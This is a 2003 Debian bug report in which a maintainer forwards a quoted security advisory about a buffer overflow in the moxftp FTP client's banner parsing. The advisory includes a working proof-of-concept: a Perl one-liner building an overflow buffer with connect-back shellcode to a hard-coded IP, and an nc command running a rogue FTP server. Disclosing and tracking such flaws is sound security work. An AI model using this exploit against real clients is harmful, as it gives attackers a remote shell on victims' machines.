Bug#187481: moxftp arbitrary code execution poc/advisory

To: submit@bugs.debian.org
Subject: Bug#187481: moxftp arbitrary code execution poc/advisory
From: Martin Schulze <joey@infodrom.org>
Date: Thu, 3 Apr 2003 20:34:17 +0200
Message-id: <[🔎] 20030403183417.GA32252@finlandia.infodrom.north.de>
Reply-to: Martin Schulze <joey@infodrom.org>, 187481@bugs.debian.org
In-reply-to: <098401c2db77$91e06a70$24029dd9@tuborg>
References: <098401c2db77$91e06a70$24029dd9@tuborg>

Package: moxftp
Version: 2.2-18
Severity: grave
Tags: security

Unfortunately I am currently unable to discover the real problem
behind this potential exploit.  I'm not even sure if it works
on Linux.

FreeBSD people simply marked this package FORBIDDEN, but didn't
fix the problem either.  *sigh*

Regards,

	Joey


Knud Erik Højgaard wrote:
> Attached document explains all.
> 
> This document is also available from http://kokanins.homepage.dk
> 
> --
> Knud
> I. BACKGROUND
> 
> According to the vendor moxftp is a "Ftp shell under X Window System".
> /usr/ports/ftp/moxftp
> 
> II. DESCRIPTION
> 
> Insufficient bounds checking leads to execution of arbitrary code. 
> 
> III. ANALYSIS
> 
> Upon parsing the '220 welcome to server' ftp banner a buffer can be
> overrun, allowing us to execute our arbitrary code. The buffer may be 
> constructed as such: [508 bytes][ebp ][eip ][nops][shellcode]. Placing 
> the nops and shellcode in the buffer before ebp seems to cause some 
> problems, luckily there's plenty of space after eip.
> 
> Example run:
> 
> $ perl -e 'print "220 " . "\x90" x 508 . "\x48\xfa\xbf\xbf" x 2 . "\x90" x 100 . "\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x68\xd9\x9d\x02\x24\x66\x68\x27\x10\x66\x51\x89\xe6\xb2\x10\x52\x56\x50\x50\xb0\x62\xcd\x80\x41\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80" .. "\n"' > file
> # nc -l -p 21 < file
> 
> This sets up a rogue server which will overflow the buffer, and execute
> the shellcode. The shellcode is connect-back to 217.157.2.36 port 10000,
> replace "\xd9\x9d\x02\x24" with a suitable ip for testing.
> 
> IV. DETECTION
> 
> moxftp-2.2 shipping with the FreeBSD ports system as well as from 
> various webpages per 9/2-03 is vulnerable.
> 
> V. WORKAROUND
> 
> unknown
> 
> VI. VENDOR FIX
> 
> unknown
> 
> VII. CVE INFORMATION
> 
> unknown
> 
> VIII. DISCLOSURE TIMELINE
> 
> unknown
> 
> IX. CREDIT
> 
> Knud Erik H?jgaard
> 


-- 
Life is too short to run proprietary software.  -- Bdale Garbee

Please always Cc to me when replying to me on the lists.

Reply to:

Prev by Date: Bug#187473: FTBFS: header file missing?
Next by Date: Bug#187473: FTBFS: header file missing?
Previous by thread: Bug#187473: FTBFS: header file missing?
Next by thread: Bug#187560: jade: should be priority "extra"
Index(es):
- Date
- Thread